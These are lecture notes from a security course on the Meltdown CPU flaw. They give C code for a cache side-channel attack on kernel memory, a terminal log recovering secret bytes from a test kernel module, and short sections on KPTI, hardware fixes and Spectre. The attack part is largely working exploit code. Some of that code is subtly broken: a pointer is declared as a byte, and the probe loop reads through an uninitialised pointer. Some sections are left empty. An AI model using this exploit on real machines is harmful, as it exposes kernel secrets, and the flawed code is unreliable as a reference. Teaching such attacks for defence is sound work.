We continue our journey to launch a meltdown attack, i.e., trying to read the kernel memory. During the last lecture, we learned: Today, we will cover the following topics:

Out-of-order Execution (from the original paper)

Out-of-order execution is an optimization technique that allows maximizing the utilization of all execution units of a CPU core as exhaustive as possible.

Speculative nature

CPUs supporting out-of-order execution let operations run speculatively to the extent that the processor's out-of-order logic processes instructions before the CPU is certain that the instruction will be needed and committed.

In particular, CPUs have branch prediction units that are used to obtain an educated guess of which instruction is executed next.

The bug

Although the instructions executed out of order do not have any visible architectural effect on registers or memory, they have micro-architectural side effects.
Read again...

Nevertheless, the cached memory contents are kept in the cache.

Implications Of the Bug In Our Context

Consider the following code:
 
//****** CHUNK 1 *********
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 ...
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");
 asm("add $0x12345, %rax");

 //****** CHUNK 2 *********;
 uint8_t kernel_data = *addr;
 A[kernel_data * 4096] += 1;              



 //...
  • Step 1: As discussed above, with the out-of-order execution feature, the CPU will probably run the following three (speculative) operations in parallel.
    Chunk 1                  (access time: ----------------------------- )
    Chunk 2                  (access time: ------------------------ )
    Access check for Chunk 2 (access time: ------------ )
    
    Chunk 2 will take long if it's really reading from the physical memory, but we can write Chunk 1 as long as we want.
  • Step 2: Speculative execution of Chunk 1 is checked, It contains all legitimate instructions. Commit the result of running Chunk 1.
  • Step 3: It's time to check the speculative execution of Chunk 2. Access check fails. Roll back. Segmentation fault.

    Note that the segmentation fault takes place after all Chunk 1 is done to make sure that correctness of the code is still maintained.

This is huge!

Due to the bug of not rolling back the cache, the cache will still have A[kernel_data*4096]!

Let's write the code

main() function

As with the previous lecture, our main function should look as follows:

int fd;
uint8_t addr;

int main()
{
  fd = open("/proc/secret_data", O_RDONLY);
  if (fd < 0) {
    perror("open");
    return -1;
  }

  printf("address: ");
  scanf("%p", &addr);

  struct sigaction action;
  action.sa_flags = SA_NODEFER;
  action.sa_handler = catch_segv;
  sigaction(SIGSEGV, &action, NULL);

  try();

  return 0;
}
The only addition is loading the kernel so that the kernel address makes sense. Remember that the program was not able to directly read the contents in the kernel space.

Other helper functions


void flush_side_channel()
{
  for (int i = 0; i < 256; i++) 
    A[i*4096] = 1;

  for (int i = 0; i < 256; i++) 
    _mm_clflush(&A[i*4096]);
}
This function flushes the cache:

int scores[256];

void probe_and_update()
{ 
  uint8_t* p;
  register uint64_t time1, time2;
  uint32_t junk;
 
  for (int i = 0; i < 256; i++) 
  {
     addr = &A[i * 4096];
     time1 = __rdtscp(&junk);
     junk = *p;
     time2 = __rdtscp(&junk) - time1;
 
     // if cache hit, add 1 for this value 
     if (time2 <= CACHE_HIT_THRESHOLD)
        scores[i]++;
  }

}

void tally_statistics()
{
  int max = 0;
  for (int i = 0; i < 256; i++) {
    if (scores[max] < scores[i]) max = i;
  }

  printf("secret: %d %c (score=%d)\n", 
    max, max, scores[max]);

  exit(0);
}
We also need a function that checks the cache. To boost accuracy, we will need to run the experiment many times. For this purpose, we will have a global array scores. We will have scores[i] contains how many times item i was in the cache.

Meltdown Attack!

The following three functions are the main core of the meltdown attack.

Try accessing the kernel memory


int trial = 0;

void meltdown()
{
  // Chunk 1
  asm(".rept 400");
  asm("add $0x432, %rax");
  asm(".endr");                    
    
  // Chunk 2: it will cause SIGSEGV
  uint8_t kernel_data = *addr;
  A[kernel_data * 4096] += 1;              
}

void try()
{
  trial++;
  flush_side_channel();

  int ret = pread(fd, NULL, 0, 0);
  if (ret < 0) {
    perror("pread");
    exit(0);
  }

  meltdown();
}
Some comments about the code on the left.
  • .rept 400 and .endr means "copy and past the in-between instructions 400 times".
  • In function try(), we use pread. In this way, the kernel module is read so the module can stay in the cache.

Catching SIGSEV


void catch_segv(int signum)
{
  trial++;

  if( trial <= 1000 )
  {
    probe_and_update(); 
    try();
  }

  tally_statistics();
}
As you see, the function tries 1000 times.
  • Before calling try() again, the code checks the cache and update the array scores
  • After all 1000 experiments are done, we tally the statistics.

Final code

meltdown.c.

Let's Launch the Attack!

choi@ubuntu:~$ uname -r
4.4.0-31-generic
choi@ubuntu:~/it432/lec/l25/resources$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432/lec/l25/resources modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
  CC [M]  /home/choi/it432/lec/l25/resources/mdown_kernel.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/choi/it432/lec/l25/resources/mdown_kernel.mod.o
  LD [M]  /home/choi/it432/lec/l25/resources/mdown_kernel.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'
choi@ubuntu:~/it432/lec/l25/resources$ sudo insmod mdown_kernel.ko
[sudo] password for choi: 
choi@ubuntu:~/it432/lec/l25/resources$ dmesg | grep secret
[   72.197417] secret data address: 0xffffffffc0409000
choi@ubuntu:~/it432/lec/l25/resources$ gcc -march=native meltdown.c -o meltdown
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409000
secret: 71 G (score=421)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409001
secret: 111 o (score=461)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409002
secret: 32   (score=470)
choi@ubuntu:~/it432/lec/l25/resources$ ./meltdown
address:  0xffffffffc0409003
secret: 78 N (score=470)

Mitigations

Kernel Page-Table Isolation (KPTI)

Mitigation of the vulnerability requires changes to operating system kernel code, including increased isolation of kernel memory from user-mode processes. Linux kernel developers have referred to this measure as kernel page-table isolation (KPTI). KPTI patches have been developed for Linux kernel 4.15, and have been released as a backport in kernels 4.14.11, 4.9.75.

Hardware Fix

On 8 October 2018, Intel was reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors.

Spectre

Using a similar technique of using the cache side-channel, Spectre breaks the isolation between different applications.

How it works

Besides executing instructions in parallel and speculatively, modern processors estimate which execution path is the most likely. This estimation can be supplied by the compiler and/or it can be found at runtime by the CPU itself.

Consider the following code:


if (x != x) 
  y = A[secret];  // never executed (are you sure?)
else 
  y = -1;
Main Idea:

Affects and mitigations

One dangerous area is the Web browser, since it is something that everybody uses, and browsers run hostile Javascript code all the time.

Since Spectre represents a whole class of attacks, most likely, it does not have a single patch to cover all different cases. However, it is possible to prevent specific known exploits based on Spectre through software patches.